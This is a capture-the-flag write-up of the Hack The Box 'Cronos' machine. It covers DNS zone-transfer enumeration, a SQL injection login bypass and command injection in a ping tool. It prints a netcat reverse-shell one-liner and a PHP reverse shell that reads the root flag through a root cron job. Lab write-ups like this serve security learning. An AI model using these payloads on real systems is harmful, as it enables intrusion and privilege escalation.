Cronos — HTB Machine

Rishabh Rai
5 min readMar 30, 2024

Today we are going to solve another machine called Cronos….. I have fired it up and run my nmap script to give me initial scans which shows three ports open let’s dig deeper into those……

Upon visiting the webpage :

When clicked on Documentation it takes me to the documentation page of laravel….

Since everythign was very simple and i couldn’t find anything i tried Gobuster and Sublist3r both to find out vhost/subdomain to the parent domain but Due to some reason i was unable to find anything. When i did some research i found out I am on the right path so. I restarted the machine and then tried again..

i was still not able to get any vhost from the machine …..
Then I came across a command which helped me to get the value for the subdomain

host -l <domain_name> <IP>

I will add admin.cronos.htb in the hosts file …….

Upon loading the admin page I only got a simple login page then i started dirsearch on the domain.. admin.cornos.htb
Found config.php but it was supposedly a rabbit hole …

Didn’t find anything in diectory listing as well……

We do have a cookie here

I tried SQL injection on the tool and found this …….

Net tool is a tool that gives you two functionality :
One → to traceroute
Two → to PING

Hindering with the burp request of PING i got command injection on the mahcine

Since we have command injection so we can execute a command and then get a reverse shell

used this
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

payload and URL encoded it to run on the box

  • * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

I changed the content of atrisan and i did got a connection request but it did not give me a reverse shell on my machine

I tried some more times but it did not work so I had to get creative and get the root flag

Content of Artisan:

<?php
// Change these values accordingly
$ip = ‘10.10.14.6’;
$port = 1456;

// Create a TCP/IP socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

// Attempt to connect to the provided IP and port
if (socket_connect($sock, $ip, $port) === false) {
die(‘Could not connect to ‘ . $ip . ‘:’ . $port . PHP_EOL);
}

// Set socket to non-blocking mode
socket_set_nonblock($sock);

// Spawn a shell
shell_exec(‘bash -c “bash -i >& /dev/tcp/’ . $ip . ‘/’ . $port . ‘ 0>&1”’);
$output = shell_exec(‘cat /root/root.txt’);
file_put_contents(‘/var/www/laravel’, $output);
?>

>>>> root.txt has the content of root flag

That is how we have PAWNED another machine for the day!! HAPPY HACKING UNTIL NEXT TIMEEE

My Review:
This box is a fundamental one and you might have to think out of the box in the start and end other than that the journey in the middle is a breeze if you are up for it. There are several rabbit holes. SO MIND YOUR STEPS !! 😂😁

Join me on various platforms to discuss Cybersecurity and Cloud-related topics. From security best practices to cloud infrastructure, let’s exchange ideas and insights and stay ahead of the curve..

CONNECT WITH ME 🔗💻

--

--

Rishabh Rai

4th year student exploring the world of cyber security with a knack for writing and always learning.